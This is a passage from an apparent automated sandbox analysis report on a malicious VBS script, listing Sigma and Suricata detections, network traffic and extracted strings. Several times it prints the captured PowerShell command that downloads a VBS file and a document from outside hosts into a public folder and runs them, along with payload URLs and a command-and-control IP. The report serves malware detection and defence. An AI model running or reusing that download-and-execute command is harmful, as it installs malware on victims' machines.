-command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ProcessId: 7592, ProcessName: powershell.exe
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7256, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8040, ProcessName: svchost.exe
                        Sigma detected: Usage Of Web Request Commands And Cmdlets
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7544, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ProcessId: 7592, ProcessName: powershell.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ProcessId: 7544, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7544, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ProcessId: 7592, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7940, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-19T12:51:39.349425+010028032702Potentially Bad Traffic192.168.2.449754202.71.109.228443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: YinLHGpoX4.vbsReversingLabs: Detection: 13%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 103.53.42.63:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49754 version: TLS 1.2
                        Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 00000013.00000003.2323829000.0000000022F00000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323638881.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: msiexec.exe, 00000013.00000003.2321624804.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: stem.Core.pdbC source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000013.00000003.2322952363.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323279955.0000000022F80000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: msiexec.exe, 00000013.00000003.2321624804.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 00000013.00000003.2322952363.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323279955.0000000022F80000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 00000013.00000003.2323829000.0000000022F00000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323638881.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000B.00000002.2154114579.0000000002F00000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: winword.exeMemory has grown: Private usage: 1MB later: 86MB

                        Networking

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023
                        Source: global trafficTCP traffic: 192.168.2.4:49830 -> 45.149.241.141:2023
                        Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
                        Source: Joe Sandbox ViewIP Address: 103.53.42.63 103.53.42.63
                        Source: Joe Sandbox ViewIP Address: 45.149.241.141 45.149.241.141
                        Source: Joe Sandbox ViewIP Address: 202.71.109.228 202.71.109.228
                        Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                        Source: Joe Sandbox ViewASN Name: UUNETUS UUNETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49754 -> 202.71.109.228:443
                        Source: global trafficHTTP traffic detected: GET /lm/lm.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.astenterprises.com.pkConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /kp/Reissuer.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /lm/List%20of%20required%20items%20and%20services.doc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.ftsengineers.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ab/ab.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D7B055 memset,memset,WSARecv,GetLastError,WSAGetLastError,WSAGetLastError,WSAGetLastError,RegisterWaitForSingleObject,20_2_04D7B055
                        Source: global trafficHTTP traffic detected: GET /lm/lm.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.astenterprises.com.pkConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /kp/Reissuer.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /lm/List%20of%20required%20items%20and%20services.doc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.ftsengineers.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ab/ab.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
                        Source: global trafficDNS traffic detected: DNS query: www.tdejb.com
                        Source: global trafficDNS traffic detected: DNS query: www.ftsengineers.com
                        Source: powershell.exe, 00000001.00000002.3013170685.00000295815EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
                        Source: powershell.exe, 0000000B.00000002.2154114579.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                        Source: powershell.exe, 00000001.00000002.3150059195.00000295EFE85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsq
                        Source: svchost.exe, 0000000F.00000002.3027338456.0000017D1B600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: wscript.exe, 00000003.00000003.1798263879.00000273F0686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799076333.00000273F0687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                        Source: wscript.exe, 00000003.00000003.1815415985.00000273EE6AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1821697131.00000273EE6BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: wscript.exe, 00000003.00000002.1821697131.00000273EE6BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: wscript.exe, 00000003.00000003.1799471839.00000273EE732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2c98068f1d7f0
                        Source: wscript.exe, 00000003.00000003.1799585945.00000273F0648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799234823.00000273F0648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1798480515.00000273F0648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabs
                        Source: wscript.exe, 00000003.00000003.1799348518.00000273EE70B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1799471839.00000273EE732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2c98068f1d
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B84D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: powershell.exe, 00000001.00000002.3013170685.00000295819B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftsengineers.com
                        Source: powershell.exe, 00000001.00000002.3128087900.00000295901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3013170685.0000029581A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3128087900.0000029590082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000001.00000002.3013170685.0000029580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D2939B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2160894575.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000006.00000002.1959985428.000001D295610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tdejb.com
                        Source: powershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000001.00000002.3013170685.00000295815EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
                        Source: powershell.exe, 00000001.00000002.3013170685.00000295819B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ftsengineers.com
                        Source: powershell.exe, 00000006.00000002.1959985428.000001D295610000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tdejb.com
                        Source: powershell.exe, 00000001.00000002.3013170685.0000029580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D2939B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 0000000B.00000002.2160894575.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: svchost.exeString found in binary or memory: https://cloudflare-dns.com/dns-query
                        Source: powershell.exe, 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B8C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B91A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2097026765.0000017D1B80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B8C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B8A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B8C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                        Source: powershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000001.00000002.3013170685.0000029580C2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D29457B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000001.00000002.3128087900.00000295901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3013170685.0000029581A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3128087900.0000029590082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B8C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                        Source: svchost.exe, 0000000F.00000003.2097026765.0000017D1B872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                        Source: powershell.exe, 00000001.00000002.3013170685.0000029580C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
                        Source: powershell.exe, 00000001.00000002.3143621780.00000295EDDA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/lm/lm.vbs
                        Source: powershell.exe, 00000001.00000002.3013170685.000002958161C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com
                        Source: powershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D294F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com/km/Reissuer.xsn
                        Source: powershell.exe, 0000000B.00000002.2160894575.0000000004D15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com/km/Reissuer.xsnH
                        Source: powershell.exe, 00000001.00000002.3013170685.000002958161C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com/lm/List
                        Source: powershell.exe, 00000001.00000002.3143621780.00000295EDDA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc
                        Source: powershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D294F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com
                        Source: msiexec.exe, 00000013.00000002.2349092290.0000000006FEC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000013.00000002.2366451436.0000000021F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.bin
                        Source: msiexec.exe, 00000013.00000002.2366451436.0000000021F20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.binLocksHydwww.tequila.ae/ab/ab.bin
                        Source: msiexec.exe, 00000013.00000002.2349092290.0000000006FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ab/ab.binl=
